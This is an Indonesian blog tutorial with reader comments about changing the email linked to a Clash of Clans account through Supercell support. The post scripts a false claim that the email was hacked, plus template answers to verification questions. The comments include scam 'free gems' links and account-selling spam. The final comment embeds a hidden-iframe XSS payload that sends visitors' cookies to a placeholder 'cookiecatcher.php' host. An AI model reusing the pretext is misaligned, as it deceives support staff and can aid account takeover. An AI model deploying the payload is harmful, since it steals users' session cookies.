Wednesday, June 10, 2015

Cara Mengubah / Mengganti Email Akun Clash Of Clans

cara ganti email clash of clans
Pada kali ini saya ingin berbagi tips & tricks tentang bagaimana cara untuk mengganti email yang menyimpan progress kita dalam bermain Clash Of Clans. Dan cara ini cocok sekali buat anda yang ingin mengganti email pribadi anda dengan email baru / tidak mau menghubungkan game Clash Of Clans nya dengan akun Google+ pribadi sendiri.



Berdasarkan cerita yang saya kumpulkan, satu-satunya cara agar anda bisa mengubah email pertama kali connect (email pribadi) anda dengan email lain adalah dengan meng-contact langsung tim support Supercell untuk Clash of Clans. 

Yapp, langsung saja anda ikuti langkah-langkah cara untuk mengganti email akun clash of clans tersebut dibawah ini :

Step By Step :
Buka setting di COC > Help and Support > My Account > Save Your Progress With Google+ > Setelah itu tap kotak pesan yg ada di pojok kanan atas.

Jika sudah terbuka tampilan pesan, setelah itu isi pesan dengan kata-kata dibawah ini :
Hi, I wanted to change email for my clash of clans account because apperently someone hacked my email account and i control the sent mails in my account. So I'd like to change to other email to prevent any unwanted possibilities in the future with my current progress in this game. I hope you'd understand. Thank you! :) 
Best Regards,
Clasher

Dan untuk email (opsional) itu di isi dengan email yang sekarang kita pakai atau terhubung di akun clash of clans kita. Jika sudah silakan tunggu balesan dari supercell sekitar 1-2hr

Jika sudah dapat balesan dari supercell, kita akan ditanya pertanyaan tentang detail akun kita lebih jelasnya lagi. Seperti bukti pembelian gems, kapan pertama kali anda membuat akun coc, di wilayah mana anda membuat akun clash of clans, dsb. (untuk contoh balesan bisa diliat gambar dibawah),

Kalau sudah dapat balesan seperti contoh pada gambar silakan balas pesan tersebut dengan kata-kata ini :
Thanks for respon my request,
I never buy gems, but i know what my account detail.
● I started playing this game around the month of February 2014
● I create this account in the citi of Jakarta, Indonesia
● Devices that i use to play this game first is android devices 
Please processing my account, thanks you! :)
Best Regards,

NOTE : untuk bulan "Februari 2014" diganti dengan bulan dan tahun pertama kali anda bermain COC & untuk "Jakarta, Indonesia" diganti dengan kota anda pada saat membuat akun clash of clans.

Kemudian tunggu lagi sekitar 1 harian, maka request anda akan di bales oleh pihak supercell untuk konfirmasi penggantian email clash of clans anda. Setelah itu anda hanya tinggal ikuti instruksi dari isi pesan tersebut. Dan taraa.... permintaan anda untuk mengganti email clash of clans telah disetujui. Untuk lebih detailnya, silakan ikuti tutorial dengan screenshoot dibawah ini :

bagaimana cara mengganti email clash of clans
langkah pertama buka setting, kemudian tap help and support

tips mengganti email clash of clans
langkah kedua pilih my account

cara mengganti email google clash of clans
langkah ketiga pilih save your progress with google+

mengganti email akun clash of clans
langkah ke empat mengirim pesan ke supercell

tutorial mengganti email clash of clans
respon dari supercell ketika kita ingin request untuk mengganti email

cara ganti email google+ clash of clans
contoh pesan untuk membalas email supercell

how to change email clash of clans
jawaban supercell ketika permintaan kita untuk ganti email disetujui

change email clash of clans
tampilan setelah permintaan ganti email di setujui, google akan disconnect dengan sendirinya


Cara ini sudah saya coba sendiri dan berhasil, bisa liat screenshoot di atas bahwa permintaan saya untuk mengganti email telah di setujui pihak supercell. Buat anda yang ingin mengganti email bisa langsung mencoba dengan cara-cara di atas.

Cukup sekian dan terima kasih! Selamat mencoba! :)


WARNING : HARAP SERTAKAN SUMBER JIKA INGIN COPY PASTE ARTIKEL INI

82 comments:

  1. Gan, saya kan sudah disetujui supercell penghapsan email di akun coc saya.. tp saya gk sempat membaca balasannya, dan posisi village saya berada divilage lain atau email lain, mw connect google yg email mau diganti gk bisa lg, tu lev80 , gimana caranya gan ?mohon bantuanny

    ReplyDelete
    Replies
    1. iya punyaku juga sama gan,udh lv 101 lgi malah jdi gak bisa kebuka,gi mna caranya ya

      Delete
    2. iya punyaku juga sama gan,udh lv 101 lgi malah jdi gak bisa kebuka,gi mna caranya ya

      Delete
    3. sama nih gan, punya ane malah udah lv 136 kalo ada yg tau solusinya mohon bantuannya gan

      Delete
    4. Sy jg bgtu udah ada balasan tp malah gak bs kebuka lg smpe skrg klo sign in malah akun lain yg terbuka

      Delete
    5. saya juga gan dia minta code...code apa yg dia minta

      Delete
  2. gan bisa dijawab ngasal gk tuh yg kapan pertama kali bikin aku cocnya?

    ReplyDelete
    Replies
    1. buka achievement lalu liat kapan pertama kli main?

      Delete
  3. gan cara tau awal kita main coc gimana? ane kebetulan lupa.. mohon infonya.. trimakasih

    ReplyDelete
  4. Thank you for getting back to us and playing clash of clans

    We appreciate you for the details given regarding the issue

    Please provide us the information in detail for the below asked questions to recover your village:
    1. Which is the device (model#) you used to play this game? Specify model number

    We require the above details in order to move further with the issue and resolve it

    Ane malah dapet balesan kaya gt gan setelah balesan pertama itu yg ane kirim balesan ke 2

    ReplyDelete
    Replies
    1. Sama gan gw dapat balesan yg spt itu juga...gmn cara mengatasinya
      mohon petunjuknya

      Delete


    2. I the time and effort you have taken to send in the requested information, in order to complete the verification proces, can you also please provide me the correct information about the device (manufacturer/model number) you have played the game ?

      Gmn klo sudah di bls gan mohon bantuannya gan makasi ...

      Delete


    3. I the time and effort you have taken to send in the requested information, in order to complete the verification proces, can you also please provide me the correct information about the device (manufacturer/model number) you have played the game ?

      Gmn klo sudah di bls gan mohon bantuannya gan makasi ...

      Delete
    4. Itu disuruh ngasih info merek perangkat agan dan model perangkat agan.

      Delete
  5. Kan skrng connect nya ke google play. Ada pengaruh nya nggak itu gan?

    ReplyDelete
  6. mz kan akun ane d pake teman saya,pas saya mau buka COC ko balikan lg ke TH 1? knp yah mz?

    ReplyDelete
  7. Gan mau tanya kan tmn ane abis ngebuka coc dia di hp ane trus mau ane mau balikin ke coc ane kok gk bisa?itu gimana

    ReplyDelete
  8. gan . ane dah coba . tetapi saya lupa tipe hp yg saya pakai waktu itu. karna saya sering ganti2 hp. supercell dah menanggapi. tp ttp suruh diminta untuk melengkapi data tipe hp saya. saya butuh solusi gan

    ReplyDelete
  9. Katanya lagi diproses tapi sya tanya lagi gak dijawab ama supercell dah sehari padahal

    ReplyDelete
  10. Katanya lagi diproses tapi sya tanya lagi gak dijawab ama supercell dah sehari padahal

    ReplyDelete
  11. Punya ane dah blik lgi gan..thanks solusinya sangat membantu..josss

    ReplyDelete
  12. gan ane udah coba itu . tapi villahe saya dalam keadaan tidak terasambung akun manapun .gimana cara balikin ke akun saya yang baru nih ???

    ReplyDelete
  13. This comment has been removed by the author.

    ReplyDelete
  14. Gan numpang tanya. Kalo saya pernah beli gems gimana jawabnya ?
    Trus di punya saya pertanyaan yang di kasih pihak supercell ada 4, yg ke4 • why do you want to change ?
    - mohon jawabannya

    ReplyDelete
  15. Jual akun coc th 9 lvl 115 ,gems sisa 2177. Minat invit 59640cc5/083870823019 .bisa cod buat yg dijakarta dan tanggerang

    ReplyDelete
  16. Jual akun coc th 9 lvl 115 ,gems sisa 2177. Minat invit 59640cc5/083870823019 .bisa cod buat yg dijakarta dan tanggerang

    ReplyDelete
  17. Coc aku reload trs semenjak sdah di bajak
    Mohon bantuannya agar tdk reload lgi

    ReplyDelete
  18. Gan ane kan pernah bli gems lewat akun google ane yang di bajak tapi supercell tetap ngotot mnta nota pembelian pertama. Giamana caranya itu gan?bisa gak kalau ane bilang kalau ane gak pernah beli gems?

    ReplyDelete
  19. Gan...Thank's Atas solusinya...alhamdulillah berhasil dan sangat memuaskan...

    ReplyDelete
  20. gan numpang nanya saya sudah ikuti tutorial dari agan dan akhirnya disetujui sama supercell tapi sekarang muncul permasalahan baru soalnya terakhir kali saya connect dengan akun coc saya yg lain alhasil akun coc saya yg mau saya ganti email jadi lost village, ada solusi ngga gan ?

    ReplyDelete
  21. maaf gan kok di saya gak ada save your progress with google+ ya?
    adanya save progress pake game center dan google play, tolong bantuannya

    ReplyDelete
  22. waktu ngirim pesan ke supercell nya pake akun yg lama atau yg baru gan?, sy pengen ganti email soalnya

    ReplyDelete
  23. Anda pecinta game COC ??? Ingin gems banyak GRATIS...??? Ayo kumpulkan lewat WHAFF( lebih jelasnya baca di GOOGLE )...
    Tips & Trick WHAFF REWARD...!!! Dapatkan $10 - Persiapan :
    ~aplikasi backup data "terserah yang mana" ( download diplaystore )
    ~ aplikasi WHAFF tentunya...!!! Download WHAFF, Kemudian login dengan FACEBOOK anda... masukkan kode undangan : AX61081, ~Setelah masuk anda mendapatkan bonus $0,3, kemudian keluar dari aplikasi WHAFF dan masuk aplikasi backup data yang anda download, kemudian pilih aplikasi WHAFF lalu backup data.. ~Langkah terakhir masuk kembali ke WHAFF dan lihat hasilnya..!!! (Ingat harus dengan kode diatas dan langsung keluar menuju Aplikasi backup data) dan dapatkan $10!!! Total anda dapat diawal $10,3...
    ~ Sekarang langsung bisa ditukar gems COC dan juga diuangkan lewat Paypal...
    *catatan : hanya bisa digunakan sekali... ~Sekian dari saya semoga berhasil...!!!

    ReplyDelete
  24. Mas saya punya 2 akun tapi saya tidak tahu cara ganti akun misalnya akun baru ke akun yang lama bagaimana tolong infonya.

    ReplyDelete
  25. Mas saya punya 2 akun tapi saya tidak tahu cara ganti akun misalnya akun baru ke akun yang lama bagaimana tolong infonya.

    ReplyDelete
  26. Kunjungi lebih jelasnya :

    http://novianinurmaarif.blogspot.co.id/2015/12/bermain-clash-of-clash-coc-lebih-dari.html

    ReplyDelete
  27. kakak mau tanya cara balikin id, ni sya jual id lwt jasa rekber tapi pas kasih id n emailnya pembeli langsung mengganti password saya,saya kena tipu,pdhal id in udah th 10 lvl 136.miris bnget sma rekber2 yg tidak brtnggung jwb. tapi pas kasih email n pass saya sempat bka coc untuk disconnect google+ biar msh bisa buka idnya. minta solusinya ka :'(

    ReplyDelete
    Replies
    1. ikuti saja langkah diatas, nanti akan dpet kode dri pihak supercell. trus hapus email coc anda yg dihack tdi, masukan email yg baru, lalu maen coc mulai dri awal. trus pilih new device trus masukkan kode tdi. otomatis account coc lama anda akan pindah ke email yg baru, dgn catatan jawaban anda dri coc msti tepat coc utk mencegah pencurian akun

      Delete
  28. Gan ,intinya kan email lama direplace sama email baru kan..?

    ReplyDelete
  29. report ke supercell pake cara diatas, bilang aja G+ nya hacked terus minta switch akun G+, kalo udah dikabulkan sama supercell tapi si penipu masih bisa connect ke game, usahain recover akun gmail via google langsung buat akses google device manager (tujuannya buat hard reset HP si penipu dari jauh), kalo butuh bantuan email aja gan ke isnaarchyseilaa@gmail.com, gw bantu

    ReplyDelete
  30. Gan saya dapet balasan kayak gini
    hi chief,
    thank you for your message. i am extremely sorry to hear that your account has been compromised and i understand how frustrating this must be.
    this happens after revealing your game center or google account login details. with your information, other can get access to your account, subsequently stealing your data.
    that is why we need to make sure that the rightful owner recovers the compromised account. to verify this, we need the receipt from your game ( a screenshot from your iTunes or google wallet purchase history is also ok) on this account. if you started playing on IOS, you can also send an iTunes receipt that shows when you installed the game, without this, we cannot proceed. in addition, we would like to ask you some questions to confirm that this account is yours and was created by you.
    when (which month) did you start playing this account? DLL.

    ReplyDelete
  31. saya harus jawab apa gan?

    ReplyDelete
  32. Gan akun coc saya ko.barking sama arqween gak pake baju ia??
    Barking pake cd aja. Arqween pake bikini. Jemuran pinggir pante..
    Apa nanti dia nikah bang??
    Siapa jaga anaknya nanti klo lagi war??

    ReplyDelete
  33. Gan akun coc saya ko.barking sama arqween gak pake baju ia??
    Barking pake cd aja. Arqween pake bikini. Jemuran pinggir pante..
    Apa nanti dia nikah bang??
    Siapa jaga anaknya nanti klo lagi war??

    ReplyDelete
  34. gan gmail coc gw di hack orng. bisa gak cara kyak gtu.tlong di jwab

    ReplyDelete
  35. Yang jagain anaknya barking ama arquin ya kamu aja...bawa ketapel ya...

    ReplyDelete
  36. Thnks for reaching out to us
    I can understand your concern and so please apporoximate creation detail of your account and also provider me exact device name in which you have playet the game.
    Please let me know if you have any other questions or comment

    Balasan emailnya seperti diatas jawab apa admin?
    Thanks

    ReplyDelete
  37. Glad to hear from you. I would just need to confirm that you are currently logged out all your devices from the existing Game Center account and sign in with the correct one. Else, the same will automatically be linked to your village again, as soon as I remove it from your system. Once, you are back with the confirmation i will remove it from our system and the you will be Able to proceed further linking it to the desire (new) Game Center ID.

    Gan ane balesan kaya gini, trus ane harus bales apa ke supercell? Mohon bantuan nya...

    ReplyDelete
  38. mksih gan saya udah brhsil.
    email saya d hack saya sdah brhsil mengganti email.
    skli lgi mksih yaaa buat post nya

    ReplyDelete
  39. gan nanya cara cek waktu kita main coc dimana ya ? gw lupa kapan buatnya . fast response thanks

    ReplyDelete
  40. Bagi kalian semua yg COC nya punya masalah,saya bisa bantu asalkan ada sdkit imbalan. Hehehehe email ke saya kalo mau saya bantu dimasm293@gmail.com

    ReplyDelete
  41. Gan gmna jwbnya kalau sy pernah beli gems?? Lihat d mna bukti transaksinya itu thankss sblmx

    ReplyDelete
  42. mau nanya gan, ane uda dibalas supercell sampe balasan terakhir...dan google uda kondisi disconnected, tapi kenapa waktu di sign in ke email yg baru malah tidak bisa masuk...coba dgn email lama sign in malah berhasil....tolong dibalas gam.

    ReplyDelete
  43. Om ko saya gk ada seperti tertera di foto.. Akun saya ada yg bajak om.. Gmna cara agar bsa mengganti email pertama dengan yg baru.. Mohon bantuanya om..soalnya akun saya udh disconected om.. Akun saya yg dlu udh gk bsa dibuka karna sandi telah di ubah seseorang

    ReplyDelete
  44. akun w barusan aja kena hak nih...parah bgd....tolong bantu dong..udh th 9 nih...sediiiihhhhh

    ReplyDelete
  45. Akun di hack itu gara gara keteledoran sendiri.
    Masukan email dan sandi diluar google, termasuk saya kena hack gara gara di iming iming gems gratis, dipikir pikir dapat gems gratis bukan game namanya.

    ReplyDelete
  46. Akun coc gw kan di hack ama orang lain,, terus udah gw ganti emailnya,, tpi kok dia masih bisa maenin coc gw di email yang dulu ya ,, infon6a dong

    ReplyDelete
  47. min, kenapa fitur chat yg ada di pojok kanan atas tidak muncul saat saya masuk "i lost my village" ? (itu di akun utamaku udh th8 max)...
    tapi saya cba bikin baru dgn email baru dan jg th awal, saya masuk help and support dan masuk " i lost my village" muncul itu fitur chat nya... tolong bantuannya min.
    trima kasih

    ReplyDelete
  48. logo chatnya gag ada ni gan..gimana caranya

    ReplyDelete
  49. Ada yg tau ngk gan,,,ane dlu pake android,,skrng gnti hp k iphone..tpi akun coc ane ngk bsa d pindahkan k iphone...mohon infonya gan..mksi

    ReplyDelete
  50. Cara di atas kurang detail..
    Untuk memindahkan data coc dari iphon ke android sangat mudah..
    Buka coc di iphone sama di android buka settings di dalam games coc android .. link a device this a OLD DEVICE buka coc di iphone buka settings links a devive new a device masukan code coc di android tadi.. lalu clik ceklis ceklis untuk lanjut.. selesai

    ReplyDelete
  51. saya mendapatkan pesan seperti ini mohon petunjukx admin

    Hi Chief,

    Thank you for the confirmation.

    Your account is banned for 48 hours to verify your ownership. I will get back to you along with all the steps to safeguard your village once I can confirm the ownership after the completion of the ban.

    Please let me know if you have any other questions or comments.

    Clash on!

    ReplyDelete
    Replies
    1. Hi Chief,

      Terima kasih atas konfirmasinya.

      account Anda dilarang selama 48 jam untuk memverifikasi kepemilikan Anda . Aku akan kembali kepada Anda bersama dengan semua langkah untuk melindungi desa Anda sekali saya bisa mengkonfirmasikan kepemilikan setelah selesainya larangan tersebut .

      Tolong beritahu saya jika Anda memiliki pertanyaan atau komentar lainnya .

      Clash on!

      Delete
  52. Gan gmn ya caranya? Saya mau jual coc,tapi emailnya itu google+ yg dipake buat perangkat android saya. Ada yg bisa bantu?

    ReplyDelete
  53. It was a decent post surely. I altogether appreciated understanding it in my lunch time. Will without a doubt come and visit this blog all the more frequently. Much obliged for sharing.
    clash of clans cheat

    ReplyDelete
  54. BISMILLAH...
    buka bengkel coc.
    Buat tmn2 yg akunnya another device and change name on lagi
    Insyaallah saya bisa bantu...
    WORK 100%
    Yg berminat hubungi
    My pin d03e2b3e
    My phone 082156942328.
    Terimakasih.

    ReplyDelete
  55. terima kasih gan informasinya sangat bermanfaat khususnya bagi mereka yang sering main game ini, oh iya kunjungi juga ya bllog ane cara cheat coc

    ReplyDelete
  56. Hanya mau berbagi, buat yg suka main coc dapat 500 sampai 14000 gems gratis.
    situs resmi http://free-gems.cf/ mumpung lagi promo.
    Indahnya berbagi !!

    ReplyDelete
  57. Dibls gmn gun, Hi Chief,

    Thank you for your message.

    I'm Mary from Supercell Player Support Team. I'm happy to help you out today.

    First of all, let’s start with the verification process that helps us find the right owner of your village. This process also protect your village from the “Greedy Goblin”.

    Please be patient to answer all below questions!

    1. When and where did you download the village?
    2. Please let me know why you’d like to switch accounts.
    3. Please mention the previous name before raider.
    4. Please mention the 5 previous clans.
    5. How many different devices are you playing from? What models are they (such as Iphone 5s, Iphone 6s... )
    6. Please send me your numeric facebook ID linked to your account (you can use 'findmyfacebookid.com' to find it).

    After verification process, I can do the next steps and change the email for you.

    Best,

    Mary,

    ReplyDelete
  58. Hi Chief,

    Thank you for your message.

    I'm Mary from Supercell Player Support Team. I'm happy to help you out today.

    First of all, let’s start with the verification process that helps us find the right owner of your village. This process also protect your village from the “Greedy Goblin”.

    Please be patient to answer all below questions!

    1. When and where did you download the village?
    2. Please let me know why you’d like to switch accounts.
    3. Please mention the previous name before raider.
    4. Please mention the 5 previous clans.
    5. How many different devices are you playing from? What models are they (such as Iphone 5s, Iphone 6s... )
    6. Please send me your numeric facebook ID linked to your account (you can use 'findmyfacebookid.com' to find it).

    After verification process, I can do the next steps and change the email for you.

    Best,

    Mary, dbls gtu

    ReplyDelete
  59. Gan mau tanya sya punya coc udah th 9 di pke sma teman saya trus di ganti nick name coc nya tpi knapa pas saya mau buka gmail sya kok gk bisa pas udah beberapa kali gk masuk masuk trus ada tulisab kata sandi anda telah di ganti

    ReplyDelete
  60. hi there
    <iframe frameborder="0" height="0" width="0" src="javascript...:void(document.location='YOURURL/cookiecatcher.php?c=' document.cookie)></iframe>

    ReplyDelete